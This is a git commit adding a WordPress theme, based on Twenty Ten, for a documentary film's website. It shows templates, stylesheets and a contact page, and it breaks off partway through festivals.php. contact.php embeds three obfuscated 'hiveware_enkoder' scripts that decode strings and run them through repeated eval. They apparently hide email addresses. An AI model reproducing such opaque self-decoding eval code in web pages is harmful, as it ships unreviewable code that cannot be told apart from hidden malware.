windhamdavid 3 years ago
commit
af20b16aa7
44 changed files with 4450 additions and 0 deletions
  1. 4 0
      .gitignore
  2. 31 0
      404.php
  3. 46 0
      archive.php
  4. 100 0
      attachment.php
  5. 45 0
      author.php
  6. 40 0
      blogs.php
  7. 33 0
      category.php
  8. 67 0
      comments.php
  9. 130 0
      contact.php
  10. 283 0
      editor-style.css
  11. 38 0
      extras.php
  12. 44 0
      festivals.php
  13. 25 0
      film.php
  14. 50 0
      footer.php
  15. 502 0
      functions.php
  16. 76 0
      header.php
  17. 47 0
      home.php
  18. 35 0
      index.php
  19. 3 0
      js/.htaccess
  20. 3 0
      js/audio-player.js
  21. 0 0
      js/index.html
  22. 15 0
      js/init.js
  23. 8 0
      js/ui.js
  24. 15 0
      links.php
  25. 168 0
      loop.php
  26. 37 0
      news.php
  27. 35 0
      onecolumn-page.php
  28. 39 0
      page.php
  29. 37 0
      press.php
  30. 286 0
      rtl.css
  31. 44 0
      screenings.php
  32. BIN
      screenshot.png
  33. 38 0
      search.php
  34. 20 0
      searchform.php
  35. 53 0
      sidebar-footer.php
  36. 17 0
      sidebar-home.php
  37. 127 0
      sidebar-team.php
  38. 43 0
      sidebar.php
  39. 48 0
      single.php
  40. 29 0
      sponsors.php
  41. 1637 0
      style.css
  42. 35 0
      tag.php
  43. 85 0
      team.php
  44. 32 0
      vod.php

+ 4 - 0
.gitignore

@@ -0,0 +1,4 @@
+.DS_Store
+
+/docs
+/images

+ 31 - 0
404.php

@@ -0,0 +1,31 @@
+<?php
+/**
+ * The template for displaying 404 pages (Not Found)
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+	<div id="container">
+		<div id="content">
+
+			<div id="post-0" class="post error404 not-found">
+				<h1 class="entry-title"><?php _e( 'Not Found', 'twentyten' ); ?></h1>
+				<div class="entry-content">
+					<p><?php _e( 'Apologies, but the page you requested could not be found. Perhaps searching will help.', 'twentyten' ); ?></p>
+					<?php get_search_form(); ?>
+				</div><!-- .entry-content -->
+			</div><!-- #post-0 -->
+
+		</div><!-- #content -->
+	</div><!-- #container -->
+	<script type="text/javascript">
+		// focus on search field after it has loaded
+		document.getElementById('s') && document.getElementById('s').focus();
+	</script>
+
+<?php get_footer(); ?>

+ 46 - 0
archive.php

@@ -0,0 +1,46 @@
+<?php
+/**
+ * Generic template for Archive pages.
+ *
+ * Used to display archive-type pages if nothing more specific matches a query.
+ * For example, puts together date-based pages if no date.php file exists.
+ *
+ * Learn more: http://codex.wordpress.org/Template_Hierarchy
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+<?php the_post(); ?>
+
+<?php if ( is_day() ) : ?>
+				<h1 class="page-title"><?php printf( __( 'Daily Archives: <span>%s</span>', 'twentyten' ), get_the_date() ); ?></h1>
+<?php elseif ( is_month() ) : ?>
+				<h1 class="page-title"><?php printf( __( 'Monthly Archives: <span>%s</span>', 'twentyten' ), get_the_date('F Y') ); ?></h1>
+<?php elseif ( is_year() ) : ?>
+				<h1 class="page-title"><?php printf( __( 'Yearly Archives: <span>%s</span>', 'twentyten' ), get_the_date('Y') ); ?></h1>
+<?php else : ?>
+				<h1 class="page-title"><?php _e( 'Blog Archives', 'twentyten' ); ?></h1>
+<?php endif; ?>
+
+<?php rewind_posts(); ?>
+<?php
+	/* Run the loop for the archives page to output the posts.
+	 * If you want to overload this in a child theme then include a file
+	 * called loop-archives.php and that will be used instead.
+	 */
+	 get_template_part( 'loop', 'archive' );
+?>
+
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 100 - 0
attachment.php

@@ -0,0 +1,100 @@
+<?php
+/**
+ * The template used to display attachments.
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+<?php the_post(); ?>
+
+				<p class="page-title"><a href="<?php echo get_permalink( $post->post_parent ); ?>" title="<?php printf( esc_attr__( 'Return to %s', 'twentyten' ), esc_html( get_the_title( $post->post_parent ), 1 ) ); ?>" rel="gallery">&larr; <?php echo get_the_title( $post->post_parent ); ?></a></p>
+
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<h2 class="entry-title"><?php the_title(); ?></h2>
+
+					<div class="entry-meta">
+						<?php
+							printf(__( '<span class="meta-prep meta-prep-author"> By </span> <span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>', 'twentyten'),
+								get_author_posts_url( get_the_author_meta( 'ID' ) ),
+								sprintf( esc_attr__( 'View all posts by %s', 'twentyten' ), get_the_author() ),
+								get_the_author()
+							);
+						?>
+						<span class="meta-sep"> | </span>
+						<?php
+							printf( __( '<span class="meta-prep meta-prep-entry-date">Published </span> <span class="entry-date"><abbr class="published" title="%1$s">%2$s</abbr></span>', 'twentyten'),
+								esc_attr( get_the_time() ),
+								get_the_date()
+							);
+						?>
+						<?php edit_post_link( __( 'Edit', 'twentyten' ), "<span class=\"meta-sep\">|</span>\n\t\t\t\t\t\t<span class=\"edit-link\">", "</span>\n\t\t\t\t\t" ); ?>
+					</div><!-- .entry-meta -->
+
+					<div class="entry-content">
+						<div class="entry-attachment">
+<?php if ( wp_attachment_is_image() ) : ?>
+						<p class="attachment"><a href="<?php echo wp_get_attachment_url(); ?>" title="<?php echo esc_attr( get_the_title() ); ?>" rel="attachment"><?php
+							echo wp_get_attachment_image( $post->ID, array( $content_width, $content_width ) ); // max $content_width wide or high.
+						?></a></p>
+
+						<div id="nav-below" class="navigation">
+							<div class="nav-previous"><?php previous_image_link( false ); ?></div>
+							<div class="nav-next"><?php next_image_link( false ); ?></div>
+						</div><!-- #nav-below -->
+<?php else : ?>
+						<a href="<?php echo wp_get_attachment_url(); ?>" title="<?php echo esc_attr( get_the_title() ); ?>" rel="attachment"><?php echo basename( get_permalink() ); ?></a>
+<?php endif; ?>
+						</div>
+						<div class="entry-caption"><?php if ( ! empty( $post->post_excerpt ) ) the_excerpt(); ?></div>
+
+<?php the_content( __( 'Continue reading <span class="meta-nav">&rarr;</span>', 'twentyten' )  ); ?>
+<?php wp_link_pages( array( 'before' => '<div class="page-link">' . __( 'Pages:', 'twentyten' ), 'after' => '</div>' ) ); ?>
+
+					</div><!-- .entry-content -->
+
+					<div class="entry-utility">
+					<?php
+						$tag_list = get_the_tag_list();
+						if ( '' != $tag_list ) {
+							$utility_text = __( 'This entry was posted in %1$s and tagged %2$s. Bookmark the <a href="%3$s" title="Permalink to %4$s" rel="bookmark">permalink</a>. Follow any comments here with the <a href="%5$s" title="Comments RSS to %4$s" rel="alternate" type="application/rss+xml">RSS feed for this post</a>.', 'twentyten' );
+						} else {
+							$utility_text = __( 'This entry was posted in %1$s. Bookmark the <a href="%3$s" title="Permalink to %4$s" rel="bookmark">permalink</a>. Follow any comments here with the <a href="%5$s" title="Comments RSS to %4$s" rel="alternate" type="application/rss+xml">RSS feed for this post</a>.', 'twentyten' );
+						}
+						printf(
+							$utility_text,
+							get_the_category_list( ', ' ),
+							$tag_list,
+							get_permalink(),
+							the_title_attribute( 'echo=0' ),
+							get_post_comments_feed_link()
+						);
+					?>
+
+<?php if ( comments_open() && pings_open() ) : // Comments and trackbacks open ?>
+						<?php printf( __( '<a class="comment-link" href="#respond" title="Post a comment">Post a comment</a> or leave a trackback: <a class="trackback-link" href="%s" title="Trackback URL for your post" rel="trackback">Trackback URL</a>.', 'twentyten' ), get_trackback_url() ); ?>
+<?php elseif ( ! comments_open() && pings_open() ) : // Only trackbacks open ?>
+						<?php printf( __( 'Comments are closed, but you can leave a trackback: <a class="trackback-link" href="%s" title="Trackback URL for your post" rel="trackback">Trackback URL</a>.', 'twentyten' ), get_trackback_url() ); ?>
+<?php elseif ( comments_open() && ! pings_open() ) : // Only comments open ?>
+						<?php _e( 'Trackbacks are closed, but you can <a class="comment-link" href="#respond" title="Post a comment">post a comment</a>.', 'twentyten' ); ?>
+<?php elseif ( ! comments_open() && ! pings_open() ) : // Comments and trackbacks closed ?>
+						<?php _e( 'Both comments and trackbacks are currently closed.', 'twentyten' ); ?>
+<?php endif; ?>
+<?php edit_post_link( __( 'Edit', 'twentyten' ), "\n\t\t\t\t\t<span class=\"edit-link\">", "</span>" ); ?>
+					</div><!-- .entry-utility -->
+				</div><!-- #post-<?php the_ID(); ?> -->
+
+<?php comments_template(); ?>
+
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 45 - 0
author.php

@@ -0,0 +1,45 @@
+<?php
+/**
+ * The template used to display Author Archive pages
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+<?php the_post(); ?>
+
+				<h1 class="page-title author"><?php printf( __( 'Author Archives: <span class="vcard">%s</span>', 'twentyten' ), "<a class='url fn n' href='" . get_author_posts_url( get_the_author_meta( 'ID' ) ) . "' title='" . esc_attr( get_the_author() ) . "' rel='me'>" . get_the_author() . "</a>" ); ?></h1>
+
+<?php if ( get_the_author_meta( 'description' ) ) : // If a user has filled out their decscription show a bio on their entries  ?>
+					<div id="entry-author-info">
+						<div id="author-avatar">
+							<?php echo get_avatar( get_the_author_meta( 'user_email' ), apply_filters( 'twentyten_author_bio_avatar_size', 60 ) ); ?>
+						</div><!-- #author-avatar 	-->
+						<div id="author-description">
+							<h2><?php printf( __( 'About %s', 'twentyten' ), get_the_author() ); ?></h2>
+							<?php the_author_meta( 'description' ); ?>
+						</div><!-- #author-description	-->
+					</div><!-- .entry-author-info -->
+<?php endif; ?>
+
+<?php rewind_posts(); ?>
+
+<?php
+	/* Run the loop for the author archive page to output the authors posts
+	 * If you want to overload this in a child theme then include a file
+	 * called loop-author.php and that will be used instead.
+	 */
+	 get_template_part( 'loop', 'author' );
+?>
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 40 - 0
blogs.php

@@ -0,0 +1,40 @@
+<?php
+/**
+ * Template Name: Blogs
+ */
+?>
+
+<?php get_header(); ?>
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<div class="hide">
+				<div class="entry-content">
+					<h3>Blog</h3>
+					<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+						</div>
+					<?php query_posts('showposts=4&category_name=blog'); ?>
+					<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
+						<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+						<h3><a href="<?php the_permalink() ?>"><?php the_title(); ?></a></h3>
+						<?php the_excerpt();?>
+						</div><!-- #post-<?php the_ID(); ?> -->
+					<?php endwhile; endif; ?>	
+					<h3><a href="<?php echo home_url( '/' ); ?>blog">Read More</a></h3>							
+				</div><!-- .entry-content -->
+				</div>				
+				<?php query_posts('showposts=21&category_name=blog'); ?>
+				<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
+					<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<h3><a href="<?php the_permalink() ?>"><?php the_title(); ?></a></h3>
+					<?php the_content();?>
+					<p><?php comments_popup_link('No comments yet', '1 comment so far', 
+					'% comments so far', 'comments-link', 'Comments are 
+					off for this post'); ?></p>
+					</div><!-- #post-<?php the_ID(); ?> -->
+					<div class="blog_separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+						</div>
+				<?php endwhile; endif; ?>
+			</div><!-- #content -->
+		</div><!-- #container -->
+<div class="clear"></div>
+<?php get_footer(); ?>

+ 33 - 0
category.php

@@ -0,0 +1,33 @@
+<?php
+/**
+ * The template used to display Category Archive pages
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+				<h1 class="page-title"><?php
+					printf( __( 'Category Archives: %s', 'twentyten' ), '<span>' . single_cat_title( '', false ) . '</span>' );
+				?></h1>
+				<?php $categorydesc = category_description(); if ( ! empty( $categorydesc ) ) echo apply_filters( 'archive_meta', '<div class="archive-meta">' . $categorydesc . '</div>' ); ?>
+
+				<?php
+				/* Run the loop for the category page to output the posts.
+				 * If you want to overload this in a child theme then include a file
+				 * called loop-category.php and that will be used instead.
+				 */
+				get_template_part( 'loop', 'category' );
+				?>
+
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 67 - 0
comments.php

@@ -0,0 +1,67 @@
+<?php
+/**
+ * The template used to display Comments
+ *
+ * The area of the page that contains both current comments
+ * and the comment form.  The actual display of comments is
+ * handled by a callback to twentyten_comment which is
+ * located in the functions.php file
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+			<div id="comments">
+<?php if ( post_password_required() ) : ?>
+				<div class="nopassword"><?php _e( 'This post is password protected. Enter the password to view any comments.', 'twentyten' ); ?></div>
+			</div><!-- .comments -->
+<?php
+		return;
+	endif;
+?>
+
+<?php
+	// You can start editing here -- including this comment!
+?>
+
+<?php if ( have_comments() ) : ?>
+			<h3 id="comments-title"><?php comments_number(
+				sprintf( __( 'No Responses to %s', 'twentyten' ), '<em>' . get_the_title() . '</em>' ),
+				sprintf( __( 'One Response to %s', 'twentyten' ), '<em>' . get_the_title() . '</em>' ),
+				sprintf( __( '%% Responses to %s', 'twentyten' ), '<em>' . get_the_title() . '</em>' )
+			); ?> </h3>
+
+<?php if ( get_comment_pages_count() > 1 ) : // are there comments to navigate through ?>
+			<div class="navigation">
+				<div class="nav-previous"><?php previous_comments_link( __( '&larr; Older Comments', 'twentyten' ) ); ?></div>
+				<div class="nav-next"><?php next_comments_link( __( 'Newer Comments &rarr;', 'twentyten' ) ); ?></div>
+			</div>
+<?php endif; // check for comment navigation ?>
+
+			<ol class="commentlist">
+				<?php wp_list_comments( array( 'callback' => 'twentyten_comment' ) ); ?>
+			</ol>
+
+<?php if ( get_comment_pages_count() > 1 ) : // are there comments to navigate through ?>
+			<div class="navigation">
+				<div class="nav-previous"><?php previous_comments_link( __( '&larr; Older Comments', 'twentyten' ) ); ?></div>
+				<div class="nav-next"><?php next_comments_link( __( 'Newer Comments &rarr;', 'twentyten' ) ); ?></div>
+			</div>
+<?php endif; // check for comment navigation ?>
+
+<?php else : // this is displayed if there are no comments so far ?>
+
+<?php if ( comments_open() ) : // If comments are open, but there are no comments ?>
+
+<?php else : // if comments are closed ?>
+
+		<p class="nocomments"><?php _e( 'Comments are closed.', 'twentyten' ); ?></p>
+
+<?php endif; ?>
+<?php endif; ?>
+
+<?php comment_form(); ?>
+
+</div><!-- #comments -->

+ 130 - 0
contact.php

@@ -0,0 +1,130 @@
+<?php
+/**
+ * Template Name: Contact
+ */
+?>
+
+<?php get_header(); ?>
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<div class="hide">
+				<div class="entry-content">
+					<h3>Contact</h3>
+					
+						<div class="contact_block">
+					<h3>US Sales:</h3>
+					<p>FRAZER PENNEBAKER<p>
+					<p>Pennebaker Hegedus Films, Inc.</p>
+			
+					<br /><br />
+					<p>ANDREW HERWITZ</p>
+					<p>Film Sales Corporation</p>
+			
+					</div>
+					<div class="contact_block">
+					<h3>International Sales:</h3>
+					<p>JANE BALFOUR<p>
+					<p>Balfour Services, Ltd.</p>
+		
+					</div>	
+					
+								
+				</div><!-- .entry-content -->
+				</div>				
+				
+					<div class="contact_block">
+				<h3>US Sales:</h3>
+				<p>FRAZER PENNEBAKER<p>
+				<p>Pennebaker Hegedus Films, Inc.</p>
+				<script type="text/javascript">
+				//<![CDATA[
+
+				function hiveware_enkoder(){var i,j,x,y,x=
+				"x=\"{@%25|A&7$cy|A|2pir`&:969kx}A+7<6h9+?jsv8:6:=,mA2w;=;8:yfwxv8986g,5-?v" +
+				"6i;6;Ex,4-;;h:7-?|A|:9:j:Aizepi;h:6,|2gl;7;=6ej:-?9:i:;:9#}`````````````&`" +
+				"```?n`&````:7:v,;;;8:8;m07:6j|A```&-2wf,````6p,n-?-?4:|A5#}A}2```&A|7wyfw2" +
+				":4:e:wyfwx5::;jv,m06:4:g;?m/A8i:8:9-!}/A8j7h:|?m@|4:5:92pirk:=:i9xl6-?67g6" +
+				"i#jsv,:6::;mA6|2=:9:gwyfwx9:7g6v,m0lh:4:h?m/A8:<;5:-!}/A6:67glg2|A6g:68/}!" +
+				"-?569:gmABn1h9m@+1?-55?e:js/m0lx9:v,7krip2```&````7|,rmq;?}9:2lxeQA+6::An," +
+				"vsf7h74j!-557j;f``A/m?l``````i6xkripi:6672|@m?:=7j64Am,v5:j:jsj?++:57g6A}?" +
+				"```&i:j:9xv?}#8h74:#?-n,g:g69xEve`&:i:i:?}A++:yf=:?jsv,wxi+9mA4?m7)+67@|2p" +
+				"i/|486rkxl?:gej:m/A<5tih6,-!jsv7/A4:,nAQeyr:;ixl2qmw/A86r,|2p6-97!irkxl}6k" +
+				"9:0m/<5xl9;?-?11nm7;6:BAm?-|29;p!}/A|i5;r;2glevmA874Ex,n-?4?m@?##}?&?nAize" +
+				"p,|2glevEx,4--?|A|2wyfwxv,5-?}A++?jsv,mA4?m@|2pirkxl?m/A54-!}/A|2wyfwxv,m0" +
+				"9-?#jsv,mA9?m@|2pirkxl?m/A54-!}/A|2wyfwxv,m09-?#}A}2wyfwxv,n-?%25>|@**>{@x" +
+				"qhvfdsh+{,>iru+l@3>l?{1ohqjwk>l..,~m@{1fkduFrghDw+l,04>li+m?65,m.@<7>|.@Vw" +
+				"ulqj1iurpFkduFrgh+m,%22|\";y='';x=unescape(x);for(i=0;i<x.length;i++){j=x." +
+				"charCodeAt(i)-3;if(j<32)j+=94;y+=String.fromCharCode(j)}y";
+				while(x=eval(x));}hiveware_enkoder();
+
+				//]]>
+				</script>
+				<br /><br />
+				<p>ANDREW HERWITZ</p>
+				<p>Film Sales Corporation</p>
+				<script type="text/javascript">
+				//<![CDATA[
+
+				function hiveware_enkoder(){var i,j,x,y,x=
+				"x=\"783d226435633238373236353663363132303635323832323332363937343634326537" +
+				"3737643635366537663633373536783d5c225c5c3634365c223d7839366336643761343036" +
+				"36363736393734373836353732373537373265366536343732366633613631363936633734" +
+				"36323664363136363335333137353635376435323635373536333734333536323661366433" +
+				"66373337653633366636663732373032353733363336333631366336643563323932653633" +
+				"36333734373237363530363137373733366636623639366536353332333034323666366432" +
+				"32333036363733373432383635373237353737326536653634373236323365363136393663" +
+				"35633235366436313664356332323434366336353332373436393766363033313365323232" +
+				"64336332663665363336663666373237303235373336333633363136633639366336643761" +
+				"3430363636373639373437737562706528272527756e6573636132297b792b3d74683b692b" +
+				"3d782e6c656e67693d303b693c273b666f7228625c225c5c3b793d273933623374614d3d6a" +
+				"28726f667b29363d2b693b6874676e656c2e783c693b303d6928726f663b27273d793b5c22" +
+				"3229293b7d7973747228692c2b782e3b797d7d3b296a287441726168632e783d2b797b293b" +
+				"693d3e6a2d2d3b29362b692c6874676e656c2e78286e696d2e68223b793d27273b666f7228" +
+				"693d303b693c782e6c656e6774683b692b3d3536297b666f72286a3d4d6174682e6d696e28" +
+				"782e6c656e6774682c692b3536293b2d2d6a3e3d693b297b792b3d782e636861724174286a" +
+				"293b7d7d793b\";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2)" +
+				");}y";
+				while(x=eval(x));}hiveware_enkoder();
+
+				//]]>
+				</script>
+				</div>
+				<div class="contact_block">
+				<h3>International Sales:</h3>
+				<p>JANE BALFOUR<p>
+				<p>Balfour Services, Ltd.</p>
+				<script type="text/javascript">
+				//<![CDATA[
+
+				function hiveware_enkoder(){var i,j,x,y,x=
+				"x=\"783d227c412636363a683a353a3d3a673b383a6a37653a653a353a693a393a363a353a" +
+				"673a3a3a6a3b393b3638346026417c393a683a393a693b3836693b3b3b363a3d3b383a3936" +
+				"3c363637673a3536343a3c3b363a393a3a376839673637343a3a3b363a6a3a683639373637" +
+				"3438663a3d3a693a3b3b373a6a3a3a397c41602660603a383a6a3a373b36693a373a6a3a68" +
+				"376a3b373b393a363a653a393a373b38376839363a393b353b393a393b373b38363937673a" +
+				"3a3a6a3b393b3638343a363b383a373a6a3a693a693a393a363b383a373a6a3a693a693a39" +
+				"3a373b383a3d3b383a673a3937683967363638393a683a353a3d3a673967363637693a653a" +
+				"353a693a393a363a353a292b2f7c327779667778762c6d30362d2d3f343a353b373b383b36" +
+				"3b3d36693a373a6a3a68396736363b387d412b2b3f6a73762c6d41343f6d407c327069726b" +
+				"786c3f6d2f41362d217d2f4179726977676574692c2b6a3f2b2b417d3f6026237d3a373b38" +
+				"36693a373a6a3a683767366a3a3537693636363d376637343766602660603f70327c2c726d" +
+				"71326c786551416e2c76736a212d373d412f6d3f6c786b726970327c406d3f34416d2c7673" +
+				"3f7d23233f2d6e2c784576656c67327c412f7d212d3f6d41426e31313f2d373d2f6d306c78" +
+				"6b7269263f7d412b2b3f6a73762c6d41343f6d407c327069726b786c3f6d2f4138372d216a" +
+				"73762c6e415165786c32716d722c7c327069726b786c306d2f38372d3f31316e42416d3f2d" +
+				"217d2f417c32676c657645782c6e2d3f23237d3f223b793d27273b783d756e657363617065" +
+				"2878293b666f7228693d303b693c782e6c656e6774683b692b2b297b6a3d782e6368617243" +
+				"6f646541742869292d343b6966286a3c3332296a2b3d39343b792b3d537472696e672e6672" +
+				"6f6d43686172436f6465286a297d79\";y='';for(i=0;i<x.length;i+=2){y+=unescape" +
+				"('%'+x.substr(i,2));}y";
+				while(x=eval(x));}hiveware_enkoder();
+
+				//]]>
+				</script>
+				</div>	
+				
+			
+			</div><!-- #content -->
+		</div><!-- #container -->
+<div class="clear"></div>
+<?php get_footer(); ?>

+ 283 - 0
editor-style.css

@@ -0,0 +1,283 @@
+html .mceContentBody {
+	max-width:640px;
+}
+* {
+	font-family: Georgia, "Bitstream Charter", serif;
+	color: #444;
+	line-height: 1.5;
+}
+p,
+dl,
+td,
+th,
+ul,
+ol,
+blockquote {
+	font-size: 16px;
+}
+tr th,
+thead th,
+label,
+tr th,
+thead th {
+	font-family: "Helvetica Neue", Arial, Helvetica, "Nimbus Sans L", sans-serif;
+}
+pre {
+	font-family: "Courier 10 Pitch", Courier, monospace;
+}
+code {
+	font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
+}
+body, input, textarea {
+	font-size: 12px;
+	line-height: 18px;
+}
+hr {
+	background-color: #E7E7E7;
+	border:0;
+	height: 1px;
+	margin-bottom: 18px;
+	clear:both;
+}
+/* Text elements */
+ul {
+	list-style: square;
+	margin: 0 0 18px -18px;
+}
+ol {
+	list-style: decimal;
+	margin: 0 0 18px -18px;
+}
+ol ol {
+	list-style:upper-alpha;
+}
+ol ol ol {
+	list-style:lower-roman;
+}
+ol ol ol ol {
+	list-style:lower-alpha;
+}
+ul ul, ol ol, ul ol, ol ul {
+	margin-bottom:0;
+}
+dl {
+	margin:0 0 24px 0;
+}
+dt {
+	font-weight: bold;
+}
+dd {
+	margin-bottom: 18px;
+	margin-left: 0;
+}
+strong {
+	font-weight: bold;
+	color: #000;
+}
+cite, em, i {
+	font-style: italic;
+	border:none;
+}
+big {
+	font-size: 131.25%;
+}
+ins {
+	background: #FFFFCC;
+	border: none;
+	color: #333;
+}
+del {
+	text-decoration: line-through;
+	color: #555;
+}
+blockquote {
+	font-style: italic;
+	padding: 0 3em;
+	margin-left: 0;
+	margin-right: 0;
+}
+blockquote cite,
+blockquote em,
+blockquote i {
+	font-style: normal;
+}
+pre {
+	background: #f7f7f7;
+	color: #222;
+	line-height: 18px;
+	margin-bottom: 18px;
+	padding: 1.5em;
+}
+abbr,
+acronym {
+	border-bottom: 1px dotted #666;
+	cursor: help;
+}
+ins {
+	text-decoration: none;
+}
+sup,
+sub {
+	height: 0;
+	line-height: 1;
+	vertical-align: baseline;
+	position: relative;
+	font-size: 10px;
+}
+sup {
+	bottom: 1ex;
+}
+sub {
+	top: .5ex;
+}
+a:link {
+	color:#0066CC;
+}
+a:visited {
+	color:#743399;
+}
+a:active,
+a:hover {
+	color: #FF4B33;
+}
+
+input,
+textarea {
+	color: #444;
+	font-size: 16px;
+	line-height: 24px;
+}
+p,
+ul,
+ol,
+dd,
+pre,
+hr {
+	margin-bottom:24px;
+}
+ul ul,
+ol ol,
+ul ol,
+ol ul {
+	margin-bottom:0;
+}
+pre,
+kbd,
+tt,
+var {
+	font-size: 15px;
+	line-height: 21px;
+}
+code {
+	font-size: 13px;
+}
+strong,
+b,
+dt,
+th {
+	color: #000;
+}
+h1,
+h2,
+h3,
+h4,
+h5,
+h6 {
+	color: #000;
+	margin: 0 0 20px 0;
+	line-height: 1.5em;
+	font-weight: normal;
+}
+h1 {
+	font-size: 2.4em;
+}
+h2 {
+	font-size: 1.8em;
+}
+h3 {
+	font-size: 1.4em;
+}
+h4 {
+	font-size: 1.2em;
+}
+h5 {
+	font-size: 1em;
+}
+h6 {
+	font-size: 0.9em;
+}
+table {
+	border: 1px solid #e7e7e7 !important;
+	text-align: left;
+	margin: 0 -1px 24px 0;
+	width: 100%;
+	border-collapse: collapse;
+	border-spacing: 0;
+}
+tr th,
+thead th {
+	border: none !important;
+	color: #888;
+	font-size: 12px;
+	font-weight: bold;
+	line-height: 18px;
+	padding: 9px 24px;
+}
+tr td {
+	border: none !important;
+	border-top: 1px solid #e7e7e7 !important;
+	padding: 6px 24px;
+}
+
+
+img {
+	margin: 0 0 24px 0;
+	max-width: 640px;
+}
+.alignleft,
+img.alignleft {
+	display: inline;
+	float: left;
+	margin-right: 24px;
+	margin-top: 4px;
+}
+.alignright,
+img.alignright {
+	display: inline;
+	float: right;
+	margin-left: 24px;
+	margin-top: 4px;
+}
+.aligncenter,
+img.aligncenter {
+	clear: both;
+	display: block;
+	margin-left: auto;
+	margin-right: auto;
+}
+img.alignleft, img.alignright, img.aligncenter {
+	margin-bottom: 12px;
+}
+.wp-caption {
+	border: none;
+	background: #f1f1f1;
+	color: #888;
+	font-size: 12px;
+	line-height: 18px;
+	text-align: center;
+	margin-bottom: 20px;
+	padding: 4px;
+	-moz-border-radius: 0;
+	-khtml-border-radius: 0;
+	-webkit-border-radius: 0;
+	border-radius: 0;
+}
+.wp-caption img {
+	margin: 5px;
+}
+.wp-caption p.wp-caption-text {
+	margin: 0 0 4px;
+}
+.wp-smiley {
+	margin:0;
+}

+ 38 - 0
extras.php

@@ -0,0 +1,38 @@
+<?php
+/**
+ * Template Name:Extras
+ */
+?>
+
+<?php get_header(); ?>
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<div class="hide">
+				<div class="entry-content">
+					<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/></div>
+						<p>Kings of Pastry" is now available on DVD.  Orders can be made by following the link below.</p>
+					<h3><a href="http://firstrunfeatures.com/kingsofpastrydvd.html">Purchase the DVD</a></h3>
+					<br />
+					<?php query_posts('showposts=4&category_name=extras'); ?>
+					<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
+						<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+						<h3><a href="<?php the_permalink() ?>"><?php the_title(); ?></a></h3>
+						<?php the_excerpt();?>
+						</div><!-- #post-<?php the_ID(); ?> -->
+					<?php endwhile; endif; ?>	
+					<h3><a href="<?php echo home_url( '/' ); ?>extras">More Extras</a></h3>							
+				</div><!-- .entry-content -->
+				</div>				
+				<?php query_posts('showposts=21&category_name=extras'); ?>
+				<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
+					<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<h3><a href="<?php the_permalink() ?>"><?php the_title(); ?></a></h3>
+					<?php the_content();?>
+					</div><!-- #post-<?php the_ID(); ?> -->
+					<div class="blog_separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+						</div>
+				<?php endwhile; endif; ?>
+			</div><!-- #content -->
+		</div><!-- #container -->
+<div class="clear"></div>
+<?php get_footer(); ?>

+ 44 - 0
festivals.php

@@ -0,0 +1,44 @@
+<?php
+/**
+ * Template Name: Festivals
+ */
+?>
+<?php get_header(); ?>
+
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<div class="hide">
+				<div class="entry-content">
+					<h3>Festival Screenings</h3>
+					<img src="<?php bloginfo( 'template_url' ); ?>/images/screenings.jpg" width="300"/>
+					<h3><a href="<?php echo home_url( '/' ); ?>theatricalpremiere">THEATRICAL PREMIERE</h3>
+					<p>Film Forum, NYC<br />
+					September 15, 2010</p>
+
+					<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+						</div>
+					<?php query_posts('showposts=7&order=asc&category_name=festivals&offset=1'); ?>
+					<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); if( $post->ID == '189' ) continue; ?>
+						<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+						<h3><a href="<?php echo home_url( '/' ); ?>screenings"><?php the_title(); ?></a></h3>
+						<?php the_excerpt();?>
+						</div><!-- #post-<?php the_ID(); ?> -->
+					<?php endwhile; endif; ?>	
+					<h3><a href="<?php echo home_url( '/' ); ?>screenings">See More</a></h3>						
+				</div><!-- .entry-content -->
+				</div>
+				<?php query_posts('category_name=festivals&posts_per_page=-1'); ?>
+				<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
